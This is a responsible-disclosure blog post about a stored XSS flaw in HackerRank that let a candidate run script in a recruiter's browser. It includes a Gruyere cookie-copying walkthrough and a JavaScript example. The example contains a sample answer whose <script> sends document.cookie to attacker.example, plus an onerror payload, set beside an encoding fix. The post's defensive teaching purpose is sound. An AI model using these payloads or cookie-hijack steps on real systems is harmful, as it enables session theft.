Ethical Vulnerability Disclosure - HackerRank
Veer Dedhia is an instructor at Fullstack Academy's Cyber Bootcamp in NYC.
Over 10 days in October 2019, the Fullstack Cyber Bootcamp team found a stored XSS vulnerability in HackerRank that would allow a test-taker to exploit a test administrator. The vulnerability was disclosed to HackerRank support, and very promptly fixed (props to the HackerRank engineering team).
HackerRank is a platform for creating assessments, primarily for hiring programmers. It’s widely used by companies as a standard way to compare candidates. Worth noting is the trust boundary: the test administrators belong to the hiring company (typically recruiters or HR) and are HackerRank’s customers, while the test takers are the candidates, outside and untrusted actors.
Cross-Site Scripting is a type of client-side web attack, where attacker-controlled code executes in the context of the victim’s browser. This type of vulnerability is consistently in the OWASP Top Ten list of web security issues.
For example, you can use my cookies from my cheesy blog (Gruyere, Google’s deliberately vulnerable web application, see below) to log into my account without knowing my password. Here's how:
- Navigate to Gruyere. Click “Agree and Start” to launch the vulnerable application. Copy the URL and send it to a friend. It will look like:
- “Sign up” for a user account with a dummy password.
- Open the Developer Tools in your browser and, in the Console, run console.log(document.cookie);. You should see something like "GRUYERE=84673500|fullstack||author;" (it’s ok if there is more).
- Send that cookie string to your friend. In their browser, on the same Gruyere URL, they open the Developer Tools and run document.cookie = "PUT_COOKIES_HERE", with your cookie string in place of the placeholder.
- They refresh the page and check the username: the site now treats them as you, and no password was ever entered.
Stored XSS is a form of cross-site scripting where the attacker’s code is first sent to the web server and stored there, waiting for a victim to trigger it. When the victim navigates to the vulnerable page, their browser runs the attacker’s code as if it came from the website itself, with the victim’s session. Again, the code has access to cookies and other data.
We found a stored XSS vulnerability in HackerRank, where a malicious test taker (job applicant) could send code to the server. That attacker code would later be viewed by the test administrator (recruiter), and the browser would execute the attacker’s code. Here’s a video where we demonstrate the full attack chain.
- We start as the Test Administrator, creating a new test for our job posting.
- We then invite a Job Applicant to take the test.
- Later, when the Test Administrator sees the completed test, the code executes!
This vulnerability affected “Fill-in-the-Blank” style questions in HackerRank. Output encoding of the user-supplied answers was inconsistent with other question types, which allowed the attacker to inject arbitrary HTML (including <script> tags). The HTML would render when the test administrator viewed the detailed answers, which is routine when evaluating test results.
HackerRank quickly acknowledged and patched this vulnerability by encoding the user input so that it renders as plain text for the test administrator. We independently confirmed the patch by re-running the same demonstration as above.
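To make the bug and the fix concrete, here is an added example of the two rendering paths. This is not HackerRank’s code (we never saw their implementation); the answer data structure, the function names and the attacker.example host are assumptions. The vulnerable renderer interpolates the stored answer straight into the markup the administrator’s browser parses; the hardened one encodes every user-controlled value for its HTML output context.

```javascript
// Added example, not HackerRank's code: a minimal "Detailed answers" renderer
// in its vulnerable and hardened forms. Data shape and names are assumptions.

// Encode the five characters that let user text break out of HTML text or
// attribute context. This is output encoding; the browser shows the original
// characters but never parses them as markup.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the candidate's stored answer goes into the page verbatim, so a
// <script> tag (or an event-handler attribute) executes in the administrator's
// session when the detailed answers are viewed.
function renderAnswersVulnerable(answers) {
  return answers
    .map((a) => `<li><b>Blank ${escapeHtml(a.blank)}:</b> ${a.text}</li>`)
    .join('\n');
}

// Hardened: the same template with the answer text encoded as well.
function renderAnswersSafe(answers) {
  return answers
    .map((a) => `<li><b>Blank ${escapeHtml(a.blank)}:</b> ${escapeHtml(a.text)}</li>`)
    .join('\n');
}

// Constructed sample submission from a hostile test taker: one benign answer,
// a <script> payload that exfiltrates the viewer's cookies, and an <img>
// event-handler payload, the usual fallback when only <script> is filtered.
const STORED_ANSWERS = [
  { blank: 1, text: 'O(n log n)' },
  { blank: 2, text: '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>' },
  { blank: 3, text: '<img src=x onerror="alert(document.cookie)">' },
];

// Crude regression check: strip the tags the template itself emits and see
// whether anything that opens a tag is left over. Only user input can put it there.
function containsInjectedMarkup(html) {
  const withoutTemplate = html.replace(/<\/?(li|b)>/g, '');
  return /<[a-zA-Z!\/]/.test(withoutTemplate);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable:\n' + renderAnswersVulnerable(STORED_ANSWERS));
  console.log('hardened:\n' + renderAnswersSafe(STORED_ANSWERS));
}
```

Run it with node to see both outputs side by side; the hardened version prints the payloads as literal text (`&lt;script&gt;…`), which is exactly what the administrator’s browser should display. The same encoding must be applied to every user-controlled field for every question type, which is the consistency that was missing here.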
- Attack requirements: a test containing at least one “Fill in the Blank” question, and a test invitation sent by the administrator to the attacker (the attacker needs nothing more than a candidate’s access).
- Trigger: the administrator views the “Detailed” answers submitted by the attacker.
- 2019-10-20: Vulnerability discovered in HackerRank site.
- 2019-10-22: First disclosure to HackerRank via support form.
- 2019-10-23 - 2019-10-24: Attack details and demo video sent to the support and engineering teams at HackerRank.
- 2019-10-25: Acknowledgement of vulnerability from the CTO & Co-founder, Harishankaran.
- 2019-10-30: HackerRank fixes this vulnerability and gives permission to publish.